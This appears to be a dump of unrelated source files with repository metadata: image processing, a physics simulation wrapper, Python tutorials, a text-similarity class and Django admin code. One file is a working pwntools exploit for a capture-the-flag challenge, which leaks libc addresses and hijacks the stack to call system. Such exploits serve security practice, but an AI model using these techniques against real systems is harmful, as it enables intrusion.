# TestAdHocRunner()
TestCommandRunner()
# TestPlayBookRunner()
# 作业
# 实现主机的增删改查
# 在添加主机的时候需要确认添加的主机是否在线
# 在线可以添加,不在线不可以添加
# ansible api
|
[
"[email protected]"
] | |
840efc99ddd9a5f51a77bb185b52f53a8a51442d
|
2d37d926159b98af115799bbbde066983e0f2c31
|
/combined_color_threshold.py
|
f4320f42c132357f95a99d329d9cf6729e366f1e
|
[] |
no_license
|
eoguzinci/advanced_lane_finding
|
cf01ed9b195aabeb31aac913ed642591ee294551
|
c08ff77ad2cef4bbc26698893b74e6dbe5adac92
|
refs/heads/master
| 2021-09-06T17:23:28.881426 | 2018-02-09T00:09:23 | 2018-02-09T00:09:23 | 104,279,437 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,668 |
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
img = mpimg.imread('test3.jpg')
thresh = (180, 255)
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
l_channel = hls[:,:,1]
# Sobel x
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
thresh_min = 20
thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
s_thresh_min = 170
s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
# Plotting thresholded images
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
ax1.set_title('Stacked thresholds')
ax1.imshow(color_binary)
ax2.set_title('Combined S channel and gradient thresholds')
ax2.imshow(combined_binary, cmap='gray')
plt.show()
|
[
"[email protected]"
] | |
b9d01644c808a33c9c69100e16e1b4652eec57a9
|
1616b2a7082196182a853ac85a336974f80dc680
|
/Tools/LibEnsemble/warpx_simf.py
|
8822d22efe1fcf163ab6f931080add47b6f9903e
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"BSD-3-Clause-LBNL"
] |
permissive
|
RevathiJambunathan/WarpX
|
a034416ae9369e48bc1f7c2ed95fa6800eb5f522
|
85bc4610adbdd5a48f1cbe666f11db6b72a781c0
|
refs/heads/development
| 2023-09-01T12:49:36.522416 | 2021-01-27T18:02:18 | 2021-01-27T18:02:18 | 174,003,690 | 0 | 4 |
NOASSERTION
| 2023-09-13T00:30:57 | 2019-03-05T18:59:20 |
C++
|
UTF-8
|
Python
| false | false | 4,170 |
py
|
import os
import time
import numpy as np
from libensemble.executors.executor import Executor
from libensemble.message_numbers import WORKER_DONE, TASK_FAILED
from read_sim_output import read_sim_output
from write_sim_input import write_sim_input
"""
This file is part of the suite of scripts to use LibEnsemble on top of WarpX
simulations. It defines a sim_f function that takes LibEnsemble history and
input parameters, run a WarpX simulation and returns 'f'.
"""
def run_warpx(H, persis_info, sim_specs, libE_info):
"""
This function runs a WarpX simulation and returns quantity 'f' as well as
other physical quantities measured in the run for convenience. Status check
is done periodically on the simulation, provided by LibEnsemble.
"""
# Setting up variables needed for input and output
# keys = variable names
# x = variable values
# libE_output = what will be returned to libE
calc_status = 0 # Returns to worker
input_file = sim_specs['user']['input_filename']
time_limit = sim_specs['user']['sim_kill_minutes'] * 60.0
machine_specs = sim_specs['user']['machine_specs']
exctr = Executor.executor # Get Executor
# Modify WarpX input file with input parameters calculated by gen_f
# and passed to this sim_f.
write_sim_input(input_file, H['x'])
# Passed to command line in addition to the executable.
# Here, only input file
app_args = input_file
os.environ["OMP_NUM_THREADS"] = machine_specs['OMP_NUM_THREADS']
# Launch the executor to actually run the WarpX simulation
if machine_specs['name'] == 'summit':
task = exctr.submit(calc_type='sim',
extra_args=machine_specs['extra_args'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
else:
task = exctr.submit(calc_type='sim',
num_procs=machine_specs['cores'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
# Periodically check the status of the simulation
poll_interval = 1 # secs
while(not task.finished):
time.sleep(poll_interval)
task.poll()
if task.runtime > time_limit:
task.kill() # Timeout
# Set calc_status with optional prints.
if task.finished:
if task.state == 'FINISHED':
calc_status = WORKER_DONE
elif task.state == 'FAILED':
print("Warning: Task {} failed: Error code {}"
.format(task.name, task.errcode))
calc_status = TASK_FAILED
elif task.state == 'USER_KILLED':
print("Warning: Task {} has been killed"
.format(task.name))
else:
print("Warning: Task {} in unknown state {}. Error code {}"
.format(task.name, task.state, task.errcode))
# Safety
time.sleep(0.2)
# Get output from a run and delete output files
warpx_out = read_sim_output(task.workdir)
# Excluding results - NaN - from runs where beam was lost
if (warpx_out[0] != warpx_out[0]):
print(task.workdir, ' output led to NaN values (beam was lost or run did not finish)')
# Pass the sim output values to LibEnsemble.
# When optimization is ON, 'f' is then passed to the generating function
# gen_f to generate new inputs for next runs.
# All other parameters are here just for convenience.
libE_output = np.zeros(1, dtype=sim_specs['out'])
libE_output['f'] = warpx_out[0]
libE_output['energy_std'] = warpx_out[1]
libE_output['energy_avg'] = warpx_out[2]
libE_output['charge'] = warpx_out[3]
libE_output['emittance'] = warpx_out[4]
libE_output['ramp_down_1'] = H['x'][0][0]
libE_output['ramp_down_2'] = H['x'][0][1]
libE_output['zlens_1'] = H['x'][0][2]
libE_output['adjust_factor'] = H['x'][0][3]
return libE_output, persis_info, calc_status
|
[
"[email protected]"
] | |
84b2147114b80a5def71d56900706a173d972b84
|
8322fc54e79c8311f8503c22236d146f3a9e4c00
|
/day03/02_python列表-list.py
|
ac8ae40a71a92a073eb038858d48346519c45db9
|
[] |
no_license
|
syasky/python
|
c8adae0014d1c3d221771f2ef06948d38aed2b7f
|
e88396503b2c9acaade8753ba6bcc9abbac3d145
|
refs/heads/master
| 2022-11-10T18:16:52.119695 | 2020-06-25T11:41:36 | 2020-06-25T11:41:36 | 274,897,249 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,413 |
py
|
#创建列表
list1=[1,2,3,'口罩','cov']
print(list1)
print(type(list1))
list2=[1,2,3,4]
print(list2)
list3=['a','b','c','d']
print(list3)
str1='hello'
list4=[str1,True,1,None,list3]
print(list4)
print('--------------------------------------------------------------')
'''
一个变量存三组数据
1组:一万,二万,三万
2组:四条,五条,六条
3组:七筒,八筒,九筒
'''
mahjong = [
['一万','二万','三万'],
['四条','五条','六条'],
['七筒','八筒','九筒']
]
#mahjong 是一个二维列表
print(mahjong)
#三维数组
threeD=[mahjong,mahjong]
print(threeD)
print('===============操作===============')
#----------1.创建----------
#快速创建 单一 值 的 纯字符串组成的list,可以用 list(str)
list5=['a','b','c']
print(list5)
list6=list('abcdefg123')
print(list6)
#list()内直接放数字可以吗?
# list(123) 不可以,因为数字是不可迭代的,不能 list() 转换位列表
#创建不是单一数据的列表
#字符串 转换
# str.split('x') 以x将str 进行分割成 list
list7='熊大/熊二/熊三'.split('/')
print(list7)
#----------2.读取列表----------
#使用 索引 或者 下标 从0开始代表第一个
list8=[2,3,4,'a','b','c']
#读取2
print(list8[0])
#读取'a'
print(list8[3])
#读取'c'. 读取可以反正读,最后一个是-1
print(list8[-1])
#假设 不知道 list8 多少个数,读取第10个数
#print(list8[9]) 会报错
#我们有个方法可以读取list 值的个数,或者说长度 len() length
print(len(list8))
#--我们不仅可以读一个数据, 还可以读一堆数据
'''
语法: list[start:end:step]
start :开始的位置,不写的话,默认开头为0
end :接受的位置(不包含结束位),不屑的话,默认 结尾+1
step : 读取的步长,默认是1,可以为负数倒着读
'''
list9=[1,2,3,4,5,6,7,8,9,10]
#list9=range(1,11)
#读取 list9 偶数位数据
print(list9[1:10:2])
print(list9[1:100:2])
print(list9[1::2])
#如果list的长度过长,恶魔也想往后取,但是数起来太麻烦,用len()
print(list9[1:len(list9):2])
#rang list9 倒叙输出
print(list9[-1::-1])
# print(list9[10::-1])
print(list9[::-1])
print(list9[len(list9)::-1])
#读取8 6 4 2
print(list9[-3::-2])
print(list9[len(list9)-3::-2])
#正取2468,倒过来
print(list9[1:-2:2][::-1])
#读取数据,偶尔遇到一种情况,以xxx位置为基础,再操作
#如果读取某个数据往后的几个数据
#5往后的三个数据
print(list9.index(5))
print(list9[list9.index(5):list9.index(5)+3])
#字符串的 某个字符开始
str2='abcdefghij'
print(str2.find('d'))
#----------3.更新列表----------
print('----------3.更新列表----------')
list10=[10,20,30]
#增加数据到xxx的结尾
#语法: xxx.append(yy)将yy增加到xxx列表的结尾
#增加40到结尾
list10.append(40)
print(list10)
#还可以增加任意数据类型
list10.append(['a','b','c'])
print(list10)
#xxx.insert(index,yy) 将yy放到xxx的index 索引位
list10.insert(0,1)
print(list10)
list10.insert(len(list10),'d')
print(list10)
#更改数据,xxx[index]='新值'
#如将1改为1024 当成将list10的某个索引位的值换个 内存地址 的指向
list10[0]=1024
print(list10)
#同一个值,内存地址一样
a=10
print(id(a))
b=10
print(id(b))
print(id(list10[1]))
ss=['a','b','c']
print(id(ss))
print(id(list10[5]))
ss1=['f','g']
list10.append(ss1)
print(list10)
print(id(ss1))
print(id(list10[-1]))
ss1[0]='ffffffffffff'
print(list10)
#----------4.删除数据----------
#语法 del xxx[索引] .delete 单词
del list10[0]
print(list10)
# 也可以删除整个list10,释放内存
del list10
#删除后 操作list10 ,会报错
# print(list10)
#----------5.列表的操作符----------
# + 连接列表
aa=[1,2,3]
bb=['4',5,6]
cc=aa+bb
print(cc)
# * 扩展 list的倍数个
shasha=aa*2
print(shasha)
# in 想象成去 教室找人,xx in 更多结果 if 使用
classroom=['张三','李四','王五']
flag=('李四' in classroom)
print(flag)
print('李四' in classroom)
flag2=('沙沙' in classroom)
print(flag2)
#if
if '张三' in classroom:
print('请你吃饭')
|
[
"[email protected]"
] | |
6e2571379cdcc6fc301ab69841937b6e9b34e72b
|
d8f3997fb9da5c8898a8a1258c64e5239410139e
|
/lab1_5.py
|
c6c6748ff997b3d07e52959e60add3a7f40cb44a
|
[] |
no_license
|
keerthikapopuri/Python
|
9dad324e99fe1ba28ddce4569c95980726575519
|
2187c7b451954f9f15ddf5e92dc47d447b1106d7
|
refs/heads/main
| 2023-06-14T20:11:09.522539 | 2021-07-13T06:18:06 | 2021-07-13T06:18:06 | 385,497,054 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 104 |
py
|
a=int(input("enter a: "))
b=int(input("enter b: "))
temp=a
a=b
b=temp
print("after swapping")
print(a,b)
|
[
"[email protected]"
] | |
822489ad746bb4d182fbf9ec11d681882e5fd98e
|
86ac96d9a9135279fbc50aab6e3fbf12894a4a5b
|
/saxsflow/core/saxs/dataset.py
|
be891e7ca29f78f8c0f3658a3cd833321226fbcb
|
[] |
no_license
|
bm29/workflow
|
7958748ae8c394d8433dd8718079601a55a6294b
|
579d3516edb074f464977d329a8bd3d47651273a
|
refs/heads/master
| 2016-09-06T16:33:00.754126 | 2015-09-18T13:39:52 | 2015-09-18T13:39:52 | 31,201,048 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,095 |
py
|
import json
class SaxsDataset(object):
'''
Biosaxs Dataset
'''
json = None
def __init__(self, jsonRecord):
self.json = json.loads(jsonRecord)
def getInput(self, i=None):
if i is None:
return self.json["INPUT"]
else:
return self.json["INPUT"][i]
def getSubtractions(self, i=None):
if i is None:
return self.json["SUBTRACTIONS"]
else:
return self.json["SUBTRACTIONS"][i]
def getSubtractionFilePathList(self):
subtractions = self.getSubtractions()
filePath = []
for i in range(len(subtractions)):
filePath.append(subtractions[i]["substractedFilePath"])
return filePath
def getMacromolecules(self, i=None):
if i is None:
return self.json["MACROMOLECULES"]
else:
return self.json["MACROMOLECULES"][i]
def getPDBfilePathList(self, i=None):
macromolecules = self.getMacromolecules()
filePath = []
for i in range(len(macromolecules)):
for j in range(len(macromolecules[i]["structure3VOs"])):
structure = macromolecules[i]["structure3VOs"][j]
if structure["structureType"] == "PDB":
filePath.append(structure["filePath"])
return filePath
def setSubtractedfilePath(self, currentFilePath, workingFolderFilePath):
subtractions = self.getSubtractions()
for i in range(len(subtractions)):
if (subtractions[i]["substractedFilePath"]) == currentFilePath:
subtractions[i]["substractedFilePath"] = workingFolderFilePath
def setPDBfilePath(self, currentFilePath, workingFolderFilePath):
macromolecules = self.getMacromolecules()
for i in range(len(macromolecules)):
for j in range(len(macromolecules[i]["structure3VOs"])):
structure = macromolecules[i]["structure3VOs"][j]
if structure["filePath"] == currentFilePath:
structure["filePath"] = workingFolderFilePath
|
[
"[email protected]"
] | |
8e7077c2e98f6f31eb5e6c24d476b9e3254d9bcf
|
873941ffbd49839dd5170c00b51f6e6d1ef51d0c
|
/题目/pwnable.tw/applestore/exp.py
|
d2f5fcd94c67e339bc8174932535f4095c0ba46d
|
[] |
no_license
|
kotorinxn/CTF
|
1fd202838b8e62a5c86f1f483a7452f79a2cfce3
|
c44f93adf5869b234d59854d2384f9b6710fbb79
|
refs/heads/master
| 2021-07-07T17:31:19.167341 | 2020-09-24T19:08:06 | 2020-09-24T19:08:06 | 189,968,976 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,720 |
py
|
from pwn import *
context(os = 'linux',arch = 'i386', log_level = 'debug')
debug = 0
if debug == 1:
p = process('./applestore')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
p = remote('chall.pwnable.tw', 10104)
libc = ELF('libc_32.so.6')
elf = ELF('./applestore')
def add(idx):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('Number>')
p.sendline(str(idx))
def delete(idx):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('Number>')
p.sendline(str(idx))
def leak(addr):
p.recvuntil('>')
p.sendline('4')
p.recvuntil('(y/n) >')
p.sendline('y\x00' + p32(addr) + '\x00' * 4 * 2)
p.recvuntil('27:')
leak_addr = u32(p.recvline()[1:5].ljust(4, '\x00'))
return leak_addr
def aaw(addr, target):
p.recvuntil('>')
p.sendline('3')
p.recvuntil('>')
p.sendline('27' + '\x00' * 4 * 2 + p32(addr - 0xc) + p32(target))
for i in range(6):
add(1)
for i in range(20):
add(2)
#checkout
#gdb.attach(p)
p.recvuntil('>')
p.sendline('5')
p.recvuntil('(y/n) >')
p.sendline('y')
#cart leak libc
#gdb.attach(p)
print_addr = leak(elf.got['printf'])
libc_base = print_addr - libc.symbols['printf']
log.info('libc_addr:' + hex(libc_base))
heap_addr = leak(0x0804B068 + 8)
log.info('heap:' + hex(heap_addr))
#gdb.attach(p)
stack_addr = leak(heap_addr + 0x4a0)
log.info('stack:' + hex(stack_addr))
#control the ebp
aaw(stack_addr + 0x20, stack_addr + 0x40)
p.recvuntil('>')
#p.sendline('6\x00' + p32(stack_addr) + p32(libc_base + libc.symbols['system']) + p32(stack_addr) + p32(libc_base + 0x15ba0b))
p.sendline('6\x00' + p32(stack_addr) + p32(libc_base + libc.symbols['system']) + p32(stack_addr) + p32(libc_base + 0x158e8b))
p.interactive()
|
[
"[email protected]"
] | |
b9f513a4388555b2bd612aad4a47b3229b8af79f
|
78e609d905f189e1df1e015a11bf3f3ae4935977
|
/python.py
|
b6d6fb158d964cf288c0002ab6dcea961ab8382d
|
[] |
no_license
|
VinayakLuha/cautious-octo-sniffle
|
650ab9b68f44a3d7269ffccfd9176f8fc25a0d56
|
b600a68bef45fc3ce6b486db23b82671aee1bbd8
|
refs/heads/master
| 2022-11-14T07:40:19.933419 | 2020-07-05T15:36:01 | 2020-07-05T15:36:01 | 277,231,005 | 0 | 0 | null | 2020-07-05T04:40:01 | 2020-07-05T04:30:27 | null |
UTF-8
|
Python
| false | false | 18 |
py
|
print("HOOOOOOO")
|
[
"[email protected]"
] | |
63459c05f9decea9fb591739d9950284975a7236
|
11594333854f35e942fde4db523a543aa74c6000
|
/Similarities.py
|
ab699aedb9ecf4b6f72de97b2486aad55e137f37
|
[] |
no_license
|
Epsilon456/WordSimilarities
|
2f43ce209470cb17810dee9860abb4b6a835a399
|
5f25cbbb1383dd3fc16a4fa38ea011412df3776e
|
refs/heads/master
| 2023-05-31T22:23:36.937710 | 2019-11-18T21:58:20 | 2019-11-18T21:58:20 | 221,731,186 | 1 | 0 | null | 2023-05-22T22:33:00 | 2019-11-14T15:38:53 |
Python
|
UTF-8
|
Python
| false | false | 17,423 |
py
|
import Levenshtein as LV
import gensim
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
"""This script contains a single class which in turn, contains all 5 of the methods to be tested (as well as their
initialization functions.) The five methods are as follows:
1) Jacard Similarity between course descriptions
2) Leveshtein Distance between course names
3) Similarity of the average Word2Vec encoding of course descriptions
4) Similarity of the Doc2Vec encodings of course descriptions.
5) Similarity of the "matrix" encoding using the pretrained GloVe encodings.
(The matrix encoding is a concatenation of 4 encoding vectors.
1) The average of all word vector encodings in the description.)
2) The average + 1 st dev of all vector encodings
3) A vector consisting of the max values of all vector encodings
4) A vector consisting of the min values of all vector encodings.
The methods used to to call these are as follows:
Jacard
Lev
WordSim
DocSim
GloveSim
"""
class Similarities:
"""This class takes in a training data frame that is used to train the word2vec and doc2vec embeddings.
The 5 methods can the be called when passed the test data frame.
Initialize this class with:
trainDF - The dataframe used to train the embeddings. This will also be the dataframe from which
the program will pull the course closest to the test course.
Mode - Either "All" for initializing all 5 methods or "Word" for only initializing "WordSim"
"""
def __init__(self,trainDF,mode="All"):
self.GloveFail = False
self.mode = mode
#The input training data frame.
self.trainDF = trainDF
#Transforms the text strings from the descriptions into a list of list of words.
self._initText()
#Initializes and trains the word2vec embeddings.
self._initWordVec()
#Only initialize DocSim and GloveSim if required.
if mode == "All":
#Initializes and trains the doc2vec embeddigns.
self._initDocVec()
#Loads in the pretrained GloVe data.
self._initGloveVec()
#Build a dictionary containing the embeddings for each description. This make it so that the
#the embedding functions only need to be called once for the test course which will then
#be compared to the embeddings in this dictionary.
self.VDF = {"Word":{},"Doc":{},"Glove":{}}
self._BuildSims()
def _initText(self):
#Get text from descriptions. The variable is a nested list where the outer list represents
#each description and the inner list is each word in that description.
self.texts = []
for index, row in self.trainDF.iterrows():
self.texts.append(row['description'].split())
print("Text initialized")
def _initWordVec(self):
#Load the list of list consisting of the course descriptions into the word2vec model. Train the model
self.WordVecModel = gensim.models.Word2Vec(self.texts,size=300,window=5,min_count=2,workers=4,iter=100)
print("Word2Vec Model initialized")
def _initDocVec(self):
#Initializes and trains the doc2vec embedding
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
documents = []
#Iterate through each course description and store each as a tagged docuent. Create list of
#tagged documents.
for i in range(len(self.texts)):
documents.append(TaggedDocument(self.texts[i],[i]))
#Train the doc2vec model with the tagged documents.
self.DocVecModel = Doc2Vec(documents, vector_size=300, window=5, min_count=2, workers=4,epochs=100)
print("Doc2Vec Model initialized")
def _initGloveVec(self):
#Initializes the pre-trained GloVe model.
import Setup
import pickle
import os
#If the model has already been saved, import it from the pickle file and store to the variabe "word_vectors"
if os.path.exists(Setup.gloveJar):
with open(Setup.gloveJar,'rb') as f:
glove = pickle.load(f)
self.gloveModel = glove
#If the model has not already been saved, call the api downloader to download the model.
else:
print("Downloading GloVe word embeddings with gensim...")
"Maybe add an option to switch off pickle mode?"
try:
import gensim.downloader as api
glove = api.load("glove-wiki-gigaword-100")
#Once the model has been downloaded, save the word_vectors as a pickle file for later use.
with open(Setup.gloveJar,'wb') as f:
pickle.dump(glove,f)
print("word vectors saved to .pkl file")
self.gloveModel = glove
print("Glove model initialized")
except:
print("Glove Sim model failed to download")
self.GloveFail = True
#Allow word vectors to be accessed by other methods in the class.
def Jacard(self,testDf,listCourse,inCourse):
"""Calculates the Jacard similarity between two course descriptions.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The Jacard similarity score scaled between 0 and 1.
"""
#Obtain the course descriptions for the two course indexes inputed into the function.
A = self.trainDF['description'][listCourse]
B = testDf['description'][inCourse]
#Create a set of words for each description.
setA = set(A.split())
setB = set(B.split())
#Count the number of words in set a that are also in set b.
score = 0
for a in setA:
if a in setB:
score +=1
#Divide the number by the total length of both sets.
return score/(len(setA.union(setB)))
def Lev(self,testDf,listCourse,inCourse):
"""Calculates the Levenshtein distance between two course names.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The compliment of the normalized Levenshtein distance
(The compliment is calculated by 1-(L/D) where L is the Levenshtein distance and D is the length of the
longer of the two strings)
This number is scaled between 0 and 1 where 1 represents a perfect match.
"""
#Obtain the couse names for the two courses provided
A = self.trainDF['name'][listCourse]
B = testDf['name'][inCourse]
#Figure out the length of the longest course name.
maxLen = max(len(A),len(B))
#Calculate the compliment of the normalized Levenshtein distance.
return 1-LV.distance(A,B)/maxLen
def _WordSimAveVec(self,df,a):
"""Calculates the a document embedding vector by taking the average of all word vectors in the document. This is
a helper function to be used with the "WordSim" method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Output:
A vector embedding representing the entire document.
"""
#Obtain the course description for the course provided and convert the string into a list of individual words.
Description = df['description'][a].split()
#Create a placeholder zero vector of the same size as the vector embedding.
Vector = np.zeros(self.WordVecModel.layer1_size)
wordCount = 0
#Iterate over each word in the description.
for word in Description:
#If the word is in the trained vocabulary, obtain the word vector.
#Continue to add the word vectors to the placeholder vector to get the running sum.
if word in self.WordVecModel.wv.vocab:
vector = self.WordVecModel.wv.get_vector(word)
Vector +=vector
#Keep track of how many word vectors (which were included in the vocabulary) were added.
wordCount +=1
#Calculate the mean by dividing the sum by the number of vectors.
return Vector/wordCount
def _BuildSims(self):
"""Builds up the dictionary "self.VDF" to contain all of the document vector embeddings which are in
the training dataset to act as a reference. This way, the references only need to be calculated once.
The method will build up the dictionary using 3 "columns" - one for each word embedding if "All" mode
was selected for initializing the class. If "Word" mode was selected, it will only build the dictionary
for the "WordSim" method.
Dictionary will be in the form VDF[Method][courseName]
"""
if self.mode == "All":
#Iterate through all rows of the training dataframe.
for index, _ in self.trainDF.iterrows():
#Obtain the document embeddings for each method.
wordVec = self._WordSimAveVec(self.trainDF,index)
docVec = self._DocSim(self.trainDF,index)
#Save the embeddings to a dictionary
self.VDF["Word"][index] = wordVec
self.VDF["Doc"][index] = docVec
if self.GloveFail == False:
gloveVec = self._GloveSim(self.trainDF,index)
self.VDF["Glove"][index] = gloveVec
if self.mode == "Word":
for index, _ in self.trainDF.iterrows():
wordVec = self._WordSimAveVec(self.trainDF,index)
self.VDF["Word"][index] = wordVec
def WordSim(self,testDF,listCourse,inCourse):
"""Calculate the cosine similarity between two vectors where each vector represents a course
description. Each vector is made by taking the average of each word vector that makes up the description. Average
vectors are calculated by a helper method "_WordSimAveVec"
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Obtain a single vector embedding for each course description (calculated by taking an average of each word
#embedding that makes up each description)
#Get the embedding from the dictionary for the list (reference) course
aVec = self.VDF["Word"][listCourse]
#Calculate the embedding with the doc2Vec model.
bVec = self._WordSimAveVec(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(aVec,0)
B = np.expand_dims(bVec,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _DocSim(self,df,a):
"""Calculate the cosine similarity between two document vectors.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number"""
#Obtain the descriptions of the two input courses.
textA = df['description'][a]
#Obtain the document embedding vector for each description.
vectorA = self.DocVecModel.infer_vector([textA], alpha=0.1, min_alpha=0.0001, steps=300)
return vectorA
def DocSim(self,testDF,listCourse,inCourse):
"""Calculates a vector embedding for a course description using the doc2vec method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Reference the VDF dictionary to get the doc embedding for the listCourse
vectorA = self.VDF["Doc"][listCourse]
#Calculate the doc embedding for the input course
vectorB = self._DocSim(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(vectorA,0)
B = np.expand_dims(vectorB,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _GloveSim(self,testDf,a):
"""Uses the word vectors from the pre-trained GloVe model to generate an array representing the document.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Outputs:
An array consistingof the mean, standard deviation, min and maximum of all word vector embeddings which
make up the course description."""
#Obtain the course description for the given course number.
doc = testDf['description'][a]
#Iterate over each word in the document. For each word in the GloVe vocab, append the word vector to a list
Vectors = []
for word in doc:
if word in self.gloveModel.vocab:
vector = self.gloveModel.get_vector(word)
Vectors.append(vector)
#Turn the list of vectors into an array.
Vectors = np.array(Vectors)
#Calculate the mean, mean+1stdev, maximum, and minimum of this array (each operation reducing
#the array to eliminate rows). Concatenate these 4 measures into one matrix to serve as an index for a
#document.
sd = np.std(Vectors,axis=0)
a0 = np.average(Vectors,axis=0)
asd = a0+sd
amax = np.max(Vectors,axis=0)
amin = np.amin(Vectors,axis=0)
return np.stack((a0,asd,amax,amin),1)
def GloveSim(self,testDf,listCourse,inCourse):
"""Calculate the cosine similarity between two document arrays.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
Outputs
Cosine similarity"""
#Obtain the matrix representation of the document encoding for each description. Transpose the matricies
#Obtain the embedding from the dictionary for the list course
A = self.VDF['Glove'][listCourse].T
#Calculate the embedding for the input course using the GloVe model.
B = self._GloveSim(testDf,inCourse).T
#Take the cosine similarity of these two matricies. This creates a 4x4 matrix where each row represents
#one of the four categories (mean,stdev,max,min) of one course description and each column represents one of the four
#of the other course description.
sim = cosine_similarity(A,B)
#The diagonal of this 4x4 matrix is a comparision of like categories across the two different course descriptions.
#By taking the average of this diagonal, a similarity score can be obtained.
result = np.average(np.diag(sim))
return result
# School Preq
#Jacard 0.762222 0.497531
#Lev 0.730000 0.475926
#WordSim 0.820000 0.517284
#DocSim 0.592222 0.444444
#GloveSim 0.598889 0.503704
|
[
"[email protected]"
] | |
9e5792142558cd46f6ba9a81e13b947bb2b6145c
|
37d612c90db933b059937b3e7ed91b06b1c22f88
|
/build/src/Django-1.0.2-final/django/contrib/admin/options.py
|
3d60b9ddf4842183dd54008172494e81d15f48fa
|
[
"BSD-3-Clause"
] |
permissive
|
taylanpince/alghalia
|
751aaba7bd01f955fc79c9e3a2bd69cc34d7bf41
|
b5a4949207e0604f035dea74538f655f73ccc2a3
|
refs/heads/master
| 2020-05-04T00:52:24.307879 | 2009-04-04T23:40:30 | 2009-04-04T23:40:30 | 155,763 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 35,792 |
py
|
from django import forms, template
from django.forms.formsets import all_valid
from django.forms.models import modelform_factory, inlineformset_factory
from django.forms.models import BaseInlineFormSet
from django.contrib.contenttypes.models import ContentType
from django.contrib.admin import widgets
from django.contrib.admin import helpers
from django.contrib.admin.util import quote, unquote, flatten_fieldsets, get_deleted_objects
from django.core.exceptions import PermissionDenied
from django.db import models, transaction
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.text import capfirst, get_text_list
from django.utils.translation import ugettext as _
from django.utils.encoding import force_unicode
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
HORIZONTAL, VERTICAL = 1, 2
# returns the <ul> class for a given radio_admin field
get_ul_class = lambda x: 'radiolist%s' % ((x == HORIZONTAL) and ' inline' or '')
class IncorrectLookupParameters(Exception):
pass
class BaseModelAdmin(object):
"""Functionality common to both ModelAdmin and InlineAdmin."""
raw_id_fields = ()
fields = None
exclude = None
fieldsets = None
form = forms.ModelForm
filter_vertical = ()
filter_horizontal = ()
radio_fields = {}
prepopulated_fields = {}
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
# If the field specifies choices, we don't need to look for special
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices:
if db_field.name in self.radio_fields:
# If the field is named as a radio_field, use a RadioSelect
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['choices'] = db_field.get_choices(
